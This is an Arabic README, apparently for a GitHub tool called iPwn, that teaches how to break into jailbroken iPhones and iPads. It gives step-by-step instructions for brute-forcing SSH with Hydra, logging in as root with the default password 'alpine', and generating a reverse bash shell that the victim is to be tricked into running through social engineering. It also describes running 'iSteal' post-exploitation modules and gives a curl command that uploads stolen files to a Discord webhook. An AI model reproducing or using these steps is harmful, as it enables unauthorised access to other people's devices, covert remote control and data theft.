
إطار مخصص لاستغلال أجهزة iOS.
إطار مصمم لاستغلال أجهزة iOS.

<!> تذكر: يجب أن يكون جهاز iPhone الذي تحاول الوصول إليه باستخدام هذه الأداة مكسور الحماية (Jailbroken) <!>
لا يزال هذا المشروع قيد العمل. أُضيف المزيد من الإضافات والخيارات للاستغلال اللاحق لجمع معلومات الجهاز وأشياء أخرى. أعمل أيضًا على طريقة لوضع حمولة (payload) في تعديل iOS عادي لتسهيل الحصول على شل عكسي (reverse shell).
[6/2/21] - إضافة قائمة إضافية للأشخاص الذين لديهم أجهزتهم متصلة بجهاز الكمبيوتر ويريدون العبث بها. سأضيف المزيد قريبًا.
[6/2/21] - إضافة 4 وحدات إضافية لأداة الاستغلال اللاحق 'iSteal'. أيضًا إضافة خيار لتثبيت كسر الحماية checkra1n.
[5/25/21] - إضافة 8 وحدات إضافية لأداة الاستغلال اللاحق 'iSteal'.
[5/25/21] - إضافة وحدتين إضافيتين لأداة الاستغلال اللاحق 'iSteal'.
iPwn هو إطار مصمم لاستغلال أجهزة iOS والوصول إليها. يحتوي أيضًا على إضافة عبارة عن إطار مصغر يسمى 'iSteal' مصمم للاستغلال اللاحق (بعد الحصول على وصول إلى الجهاز). سيرشدك هذا الوصف عبر الطرق والخطوات المختلفة للوصول إلى جهاز iOS وجمع المعلومات منه.
الطريقة الأولى للوصول إلى جهاز iOS - هجوم القوة العمياء على SSH (SSH-Bruteforcing).
معظم أجهزة iOS المكسورة الحماية والتي تحتوي على Cydia تأتي مثبتة مسبقًا مع OpenSSH. وعادةً ما تكون بيانات الاعتماد ضعيفة جدًا أو شائعة، أحد أكثر كلمات المرور شيوعًا ستكون موجودة في قائمة كلمات (wordlist) يجب أن تكون في مجلدك إذا قمت بتنزيل iPwn من مستودع GitHub الخاص بي.
إذن لنبدأ! أولاً، سنبدأ بتشغيل السكريبت.
python main.py
بعد ذلك، سنقوم بكتابة الأمر 'brute'. (إذا أردت كتابة help والتعرف على الأوامر، يمكنك فعل ذلك.)

بمجرد كتابة الأمر 'brute'، اكتب 'help' لعرض جميع الأوامر المتاحة.
الآن، سنستخدم الأمر 'default' لبدء هجوم القوة العمياء على SSH باستخدام قائمة كلمات تحتوي على أكثر كلمات المرور شيوعًا.
سيُطلب منك إدخال عنوان IP للهدف، تأكد من إدخال عنوان صحيح وصالح، ثم اضغط Enter، ثم تابع الخطوة التالية.

<!> إذا كنت تواجه أخطاء، تأكد من تثبيت Hydra، يمكنك تثبيته باستخدام الأوامر أدناه <!>
أوامر تثبيت hydra:
sudo apt install hydra
sudo pacman -S hydra
والآن نعود إلى الشرح، إذا كان Hydra مثبتًا على جهاز الكمبيوتر الخاص بك، فيجب أن يكون قد بدأ بالفعل في محاولة الهجوم. فقط انتظر حوالي 20-40 ثانية، وإذا كان الجهاز يستخدم بيانات الاعتماد الافتراضية/الشائعة الموجودة في قائمة الكلمات، فسيعطيك Hydra رسالة صغيرة تظهر كلمة المرور الصحيحة.

كما نرى، كلمة المرور الصحيحة هي 'alpine'. الآن يمكننا تسجيل الدخول إلى الهاتف عن طريق كتابة 'ssh root@ip_goes_here' في نافذة طرفية أخرى. بمجرد أن يطلب منك كلمة المرور، أدخل كلمة المرور التي حصلت عليها من Hydra.

الآن نحن مسجلون الدخول!

في هذه المرحلة، ربما نرغب في جمع بعض المعلومات عن الهاتف والتحكم به، وسيأتي ذلك لاحقًا. لأننا نحتاج أولاً إلى تثبيت بعض الأشياء المهمة جدًا. إذا كنت ترغب في استخدام SCP لنقل ملف الإعداد الذي يقوم بأتمتة كل شيء، فيمكنك فعل ذلك. الملف موجود في /post-exploitation/post.sh. بمجرد نقل ملف 'post.sh' إلى جهاز iOS، قم بتنفيذه عن طريق كتابة 'bash post.sh' ويجب أن يبدأ في تثبيت وإعداد أدوات الاستغلال اللاحق التي سنستخدمها.
<!> ملاحظة: الأوامر أدناه مخصصة فقط للأشخاص الذين يريدون تثبيت الحزم والأدوات الضرورية يدويًا <!>
قم بتشغيل كل هذه الأوامر لإعداد/تثبيت كل ما هو مطلوب:
apt install netcat
apt install python3
apt install nano
git clone https://github.com/0x1CA3/iSteal.git
حسنًا، الآن بعد أن أصبح لدينا كل شيء مثبتًا، يمكننا الدخول إلى مجلد 'iSteal' وتشغيل سكريبت الاستغلال اللاحق 'iSteal'.
python3 post.py
<!> ملاحظة: تأكد عند محاولة تشغيل ملفات Python أن تقوم بتشغيلها باستخدام "python3" بدلاً من "python" أو "py" <!>
الآن يجب أن يكون السكريبت قد تم تحميله، إذا أردت استخدام الأمر 'help' والتجول، يمكنك فعل ذلك.

الآن، سنستخدم الأمر 'list' لعرض الوحدات/الخيارات المتاحة للاستغلال اللاحق.

<!> تذكر: سيكون هناك الكثير من التحديثات على سكريبت الاستغلال اللاحق، وسيتم إضافة المزيد من الوحدات، لذلك سيتم تحديث هذه الصورة من أجل الدقة <!>
لاستخدام وحدة، ببساطة افعل 'use specific/module'. مثال: use modules/list_installed_default_apps
وكما ترى، عندما نقوم بتشغيل هذه الوحدة، تظهر لنا التطبيقات الافتراضية المثبتة على جهاز iOS الهدف.

الطريقة الثانية للوصول إلى جهاز iOS - الشل العكسي (Reverse shell).
الآن، سأريكم كيفية القيام بذلك بالطريقة الثانية، وهي أكثر تقدمًا بعض الشيء. ضع في اعتبارك أنني لن أدرج صورًا لهذا الجزء.
قم بتشغيل إطار iPwn عن طريق كتابة 'python main.py'
اكتب الأمر 'payload'
انتظر حتى يتم تحميل مصنع الحمولات.
اختر حمولة من اختيارك، مثال: use payloads/factory/reverse_bash
أدخل عنوان IP الخاص بك
أدخل المنفذ الخاص بك
ثم يجب أن تتلقى رسالة تفيد بأنه 'تم إنشاء الحمولة'
اكتب الأمر 'back' للعودة إلى القائمة الرئيسية
اكتب الأمر 'listen' لبدء الاستماع للاتصالات الواردة
تأكد من أن الضحية يقوم بتشغيل السكريبت عبر الطرفية أو بطريقته الخاصة، جرب الهندسة الاجتماعية، كن مبدعًا!
بمجرد تنفيذ السكريبت على جهاز iOS الخاص بالضحية، يجب أن تحصل على اتصال
قم بتثبيت الحزم المهمة عن طريق نقل ملف 'post.sh' الموجود في /post-exploitation وتنفيذه، أو قم بذلك يدويًا بنفسك.
يمكنك الآن تشغيل أدوات الاستغلال اللاحق 'iSteal' أو 'AutoEnum'
استمتع! :)
<!> إذا كنت تقوم بالخطوة 2 وواجهت صعوبة في الجزء الذي يجب عليك فيه تثبيت الحزم/الأدوات المهمة، فاذهب إلى الخطوة 1 وانسخ دليل تثبيت الحزم/الأدوات! <!>
هناك طرق متعددة لنقل الملفات إلى جهاز iOS وهناك أيضًا العديد من الطرق لتنزيلها. أسهل طريقة لاستخراج وتنزيل الملفات من جهاز iOS هي استخدام Curl وخطاف Discord (webhook).
<!> ملاحظة: المقطع أدناه سيوضح كيفية استخراج وتنزيل الملفات من جهاز iOS باستخدام curl <!>
الخطوة 1: إنشاء خادم Discord
الخطوة 2: إنشاء خطاف ويب ونسخ الرابط
الخطوة 3: على جهاز iOS، انتقل إلى الدليل الذي يحتوي على الملف الذي تريد استرجاعه.
الخطوة 4: أدخل الأمر أدناه (استبدل file_here.txt باسم ملفك، واستبدل webhook_url_here برابط خطاف الويب الخاص بك)
curl -i -H 'Expect: application/json' -F file=@file_here.txt -F 'payload_json={ "wait": true, "content": "", "username": "" }' webhook_url_here
الخطوة 5: انتظر حوالي 10-50 ثانية
تم! يجب الآن أن يكون الملف قد تم رفعه إلى خادم Discord الخاص بك. يمكنك الآن تنزيل/عرض الملف.
Windows 10 - مستقر
Garuda Linux - مستقر
توزيعات Arch - مستقر
الأجهزة المدعومة [إضافة الاستغلال اللاحق يجب أن تعمل على جميع هذه]
-----------------
أجهزة iPod الأحدث من الجيل الرابع
iPhone 4
iPhone 4S
iPhone 5
iPhone 6
iPhone SE
iPhone 7
iPhone 7+
iPhone 8
iPhone 8+
iPhone X
iPhone XR
iPhone XS
iPhone 11
iPhone 12
الأجهزة التي اختبرتها بنفسي [تلك التي اختبرتها شخصيًا]
---------------------
iPhone 4S
iPhone 5S
iPhone SE
iPhone 7+
iPad Air
iPod الجيل الرابع
